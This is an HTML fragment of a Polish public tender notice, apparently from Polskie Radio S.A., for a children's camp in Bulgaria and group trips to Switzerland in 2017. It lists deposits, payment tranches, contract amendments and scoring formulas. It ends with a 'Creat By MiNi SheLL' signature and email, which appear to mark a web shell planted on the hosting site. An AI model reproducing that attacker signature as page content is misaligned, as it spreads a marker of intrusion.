17.1.1 Zadanie nr 1  5 000,00 PLN (słownie: pięć tysięcy złotych 00/100)
17.1.2 Zadanie nr 2  5 000,00 PLN (słownie: pięć tysięcy złotych 00/100)
17.2 Wadium wpłaca/wnosi się przed upływem terminu składania ofert w następujących formach (w zależności od wyboru wykonawcy):
1) pieniądzu, wpłaconym na konto: Polskie Radio S.A. (Bank Handlowy S.A.) 
nr: 20 1030 1508 0000 0008 1720 3078;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych; 
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. 2016, poz. 359)
17.3 W przypadku wnoszenia wadium w formie wskazanej w pkt. 17.2 ppkt 1) SIWZ (w pieniądzu) terminem wniesienia wadium jest data i godzina uznania rachunku bankowego Zamawiającego (zaksięgowania wymaganej kwoty wadium na rachunku bankowym Zamawiającego).
17.4 W przypadku wniesienia wadium w formie gwarancji bankowej bądź ubezpieczeniowej, koniecznym jest, aby gwarancja obejmowała odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez wykonawcę, określone w art. 46 ust. 4a i 5 ustawy. Koniecznym jest również, aby gwarancja obejmowała cały okres związania ofertą określony w SIWZ. W przypadku, gdy gwarancja bankowa lub ubezpieczeniowa nie spełni któregokolwiek ze wskazanych powyżej wymogów, Zamawiający wykluczy wykonawcę z postępowania. 
17.5 W przypadku wniesienia wadium w formie innej niż w pkt. 17.2 ppkt 1) SIWZ konieczne jest dołączenie oryginału dowodu wniesienia wadium do oferty.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Należy podać informacje na temat udzielania zaliczek:
                  <br />Zadanie 1 zgodnie z § 3 wzoru umowy załącznik nr 6 do SIWZ
1.	Cena za cały pobyt 1 uczestnika w Bułgarii w miejscowości . wynosi . PLN brutto (słownie: . PLN), w tym podatek VAT i obejmuje świadczenia określone w szczegółowym opisie przedmiotu zamówienia i programie Wykonawcy.
2.	Łączna wartość umowy (łączna cena pobytu w Bułgarii w miejscowości .) za 40 uczestników wynosi  PLN brutto (słownie: .. PLN). 
3.	Zapłata kwoty określonej w ust. 2 nastąpi na podstawie prawidłowo wystawionych faktur VAT w trzech transzach:
3.1.	transza I w wysokości 20% ogólnej wartości umowy, tj. . PLN brutto (słownie zł: .. PLN) zostanie przekazana na konto Wykonawcy w terminie 14 dni od daty podpisania umowy,
3.2	transza II w wysokości 40% ogólnej wartości umowy, tj. . PLN brutto (słownie zł: .. PLN) zostanie przekazana na konto Wykonawcy  na 14 dni przed rozpoczęciem kolonii i obozu,
3.3	transza III pozostała kwota wynagrodzenia należnego Wykonawcy wynikająca z faktycznej liczby uczestników kolonii i obozu (faktyczna transza rozliczeniowa), po odliczeniu kwot już zapłaconych przez Zamawiającego w transzy I i II, płatna w terminie 14 dni po zakończeniu pobytu dzieci. Kwota III transzy zależy od faktycznej liczby uczestników, którzy skorzystali z kolonii i obozu. 
Zadanie 2 zgodnie z § 3. wzoru umowy załącznik nr 6a do SIWZ
1.	Cena za cały pobyt 1 uczestnika w Szwajcarii wynosi . PLN brutto (słownie: . PLN), w tym podatek VAT i obejmuje świadczenia określone w szczegółowym opisie przedmiotu zamówienia oraz programie Wykonawcy.
2.	Łączna wartość umowy (łączna cena pobytu w Szwajcarii) dla 120 uczestników wynosi  PLN brutto (słownie zł: ... PLN). 
3.	Zapłata kwoty określonej w ust. 2 nastąpi na podstawie prawidłowo wystawionych faktur VAT 
w  3transzach:
3.1.	transza I w wysokości 20% ogólnej wartości umowy wskazanej w § 3 ust. 2, tj. .. PLN brutto (słownie zł : .. PLN) zostanie przekazana na konto Wykonawcy w terminie 14 dni od daty podpisania umowy,
3.2.	transza II w wysokości 30% ogólnej wartości umowy wskazanej w § 3 ust. 2, 
tj. . PLN brutto (słownie zł: .. PLN) na 14 dni przed pierwszym terminem wyjazdu uczestników do Szwajcarii,
3.3.	transza III  pozostała kwota wynagrodzenia należnego Wykonawcy wynikająca z faktycznej liczby uczestników I i II grupy wyjazdu turystyczno-wypoczynkowego (faktyczna transza rozliczeniowa), po odliczeniu kwot już zapłaconych przez Zamawiającego w transzy I i II, płatna w terminie 14 dni po zakończeniu pobytu uczestników drugiej grupy w Szwajcarii. Kwota III transzy zależy od faktycznej liczby uczestników I i II grupy, którzy skorzystali z wyjazdu turystyczno-wypoczynkowego.</div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr><tr><td></td><td></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">Wzór umowy dla zadania 1 stanowi załącznik nr 6 do SIWZ.
Wzór umowy dla zadania 2 stanowi załącznik nr 6a do SIWZ.</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania zamówienia.</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zadanie 1 zmiany zostały określone we wzorze umowy załącznik nr 6 do SIWZ
1.Zamawiający przewiduje możliwość dokonania istotnych zmian umowy w przypadku:
1.1.zmiany powszechnie obowiązującej stawki VAT, 
1.2.zmiany terminu kolonii, w przypadku zdarzeń losowych, za które Wykonawca nie ponosi winy i których nie można było przewidzieć przy zachowaniu należytej staranności. Zamawiający musi wyrazić pisemną zgodę na taką zmianę. Zmiana terminu może zostać dokonana tylko w przypadku, gdy pozostałe warunki kolonii i obozu wymienione w szczegółowym opisie przedmiotu zamówienia i przedstawione w programie nie zostaną zmienione,
1.3. zmiany osoby (osób) wyznaczonych do realizacji zamówienia, w tym wychowawców kolonii i obozu oraz kierownika kolonii i obozu, po uzyskaniu pisemnej zgody od Zamawiającego na dokonanie takiej zmiany oraz z zastrzeżeniem, że nowe osoby będą posiadały takie samo doświadczenie i kwalifikacje lub wyższe niż przedstawione w złożonej ofercie,
1.4. zmiany hotelu na inny niż wskazany w ofercie, w przypadku nieprzewidzianego zdarzenia losowego, przed rozpoczęciem imprezy lub w trakcie jej trwania. Zmiana taka musi zostać zgłoszona Zamawiającemu, a warunkiem dokonania takiej zmiany musi być zaoferowanie hotelu o standardzie co najmniej takim samym jak wskazany w ofercie lub wyższym spełniającym wszystkie wymagania opisane przez Zamawiającego w załączniku nr 1 do niniejszej umowy.         
2. Zmiana postanowień niniejszej umowy wymaga zachowania formy pisemnej pod rygorem nieważności.
Zadanie 2 zmiany zostały określone we wzorze umowy załącznik nr 6a do SIWZ
2.	Zamawiający przewiduje możliwość dokonania zmiany umowy w przypadku:
2.1. zmiany powszechnie obowiązujących przepisów prawa w tym stawki podatku od towarów i usług,
2.2. zmiany terminu imprezy, w przypadku zdarzeń losowych, za które Wykonawca nie ponosi winy i których nie można było przewidzieć przy zachowaniu należytej staranności. Zamawiający musi wyrazić pisemna zgodę na taką zmianę. Zmiana terminu może zostać dokonana tylko w przypadku, gdy pozostałe warunki imprezy wymienione w szczegółowym opisie przedmiotu zamówienia i przedstawione w programie nie zostaną zmienione,
2.3. zmiany osoby (osób) wyznaczonych do realizacji zamówienia, w tym przewodnika imprezy, po uzyskaniu pisemnej zgody od Zamawiającego na dokonanie takiej zmiany oraz z zastrzeżeniem, że nowe osoby będą posiadały takie samo doświadczenie i kwalifikacje lub wyższe niż przedstawione w złożonej ofercie,
2.4. zmiany hotelu na inny niż wskazany w ofercie, w przypadku nieprzewidzianego zdarzenia losowego, przed rozpoczęciem imprezy lub w trakcie jej trwania. Zmiana taka musi zostać zgłoszona Zamawiającemu, a warunkiem dokonania takiej zmiany musi być zaoferowanie hotelu o standardzie co najmniej takim samym jak wskazany w ofercie lub wyższym spełniającym wszystkie wymagania opisane przez Zamawiającego w załączniku nr 1 do niniejszej umowy.
3. Zmiana postanowień niniejszej umowy wymaga zachowania formy pisemnej pod rygorem nieważności.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 13/04/2017, godzina: 13:45,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Kolonia i obóz<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ZADANIE 1  zorganizowanie kolonii i obozu do Bułgarii dla dzieci w jednym terminie, dla 30 dzieci w dwóch przedziałach wiekowych: 10-14 lat i 15-19 lat. Zamawiający zastrzega, że dzieci wysyłane na kolonię i obóz w dniu wyjazdu mogą mieć nieukończone 10 lat. 
Realizacja wyjazdu w okresie od minimum 11 kolejnych dni kalendarzowych do maksimum 13 kolejnych dni kalendarzowych w terminie pomiędzy 01.07.2017 r. a 06.08.2017 r. Czas trwania pobytu: minimum 11 dni, włącznie z dniem wyjazdu i przyjazdu, w tym minimum 10 noclegów, maksymalnie 13 dni w tym 12 noclegów.
Zamawiający zastrzega w zamówieniu opcjonalnym możliwość wysłania dodatkowo do 10 dzieci czyli zwiększenia zamówienia maksymalnie do 40 dzieci w terminie określonym w zamówieniu podstawowym i na takich samych warunkach i w cenie zaoferowanej w ofercie najkorzystniejszej zgodnie z warunkami wskazanymi w umowie.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>63511000-4, 63510000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 01/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Aspekty społeczne</td><td>20</td></tr><tr><td>Dodatkowa atrakcja turystyczna</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>C  cena oferty  waga 60%  maksymalna liczba punktów, którą może uzyskać oferta w tym kryterium to 60 pkt. 
Punkty w tym kryterium zostaną obliczone w następującym sposób: cena jednostkowa zaproponowana przez Wykonawcę w Formularzu Oferty (załącznik 
nr 4 do SIWZ) pkt 1.2 zostanie podzielona przez liczbę oferowanych dni kolonii i obozu wpisanych w Formularzu Oferty w punkcie: 5.1.2. Wartość uzyskana w wyniku działań matematycznych Zamawiającego (Co = Cj / Ld) zostanie następnie podstawiona do wzoru:  
C = (Nco / Cb) x 60% x 100
w ten sposób Zamawiający wyłoni cenę oferty najkorzystniejszej.  
Słownik skrótów użytych w kryterium cena oferty: 
C  liczba punktów uzyskanych przez ofertę w kryterium cena
Cj  cena jednostkowa wskazana przez wykonawcę w Formularzu Oferty
Ld  liczba dni kolonii i obozu wskazana przez wykonawcę w Formularzu Oferty
Co  cena ofertowa będąca wynikiem działań matematycznych przeprowadzonych przez Zamawiającego (podzielenia ceny jednostkowej przez liczbę oferowanych dni kolonii i obozu)
Nco  najniższa cena ofertowa spośród porównywanych cen, które Zamawiający uzyskał po przeprowadzeniu działań matematycznych zgodnie ze wzorem:
Co = Cj / Ld
Cb  cena badanej oferty
Szczegółowe informacje na temat punktacji w kryteriach oceny ofert w zadaniu 1 zawiera pkt 22.1 SIWZ i 22.2 SIWZ.<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Wyjazd turystyczno-wypoczynkowy<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ZADANIE 2  zorganizowanie dwóch wyjazdów turystyczno-wypoczynkowych (zwanych dalej również wycieczką lub imprezą turystyczną) do Szwajcarii łącznie dla 72 osób w dwóch terminach dla dwóch grup, w każdej grupie po 36 osób.
Zamawiający zastrzega w zamówieniu opcjonalnym możliwość wysłania dodatkowych do 48 osób, czyli dodatkowo maksymalnie do 24 osób w każdej grupie, czyli zwiększenia zamówienia łącznie maksymalnie do 120 osób (2 grupy po 60 osób każda) w terminach określonych w zamówieniu podstawowym i na takich samych warunkach i w cenie zaoferowanej w ofercie najkorzystniejszej zgodnie z warunkami wskazanymi w umowie.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>63511000-4, 63500000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 08/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Rodzaj transportu</td><td>30</td></tr><tr><td>Dodatkowa atrakcja turystyczna</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Szczegółowe informacje na temat punktacji w kryteriach oceny ofert zadaniu 2 zawiera pkt 22.3 SIWZ i 23 SIWZ.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com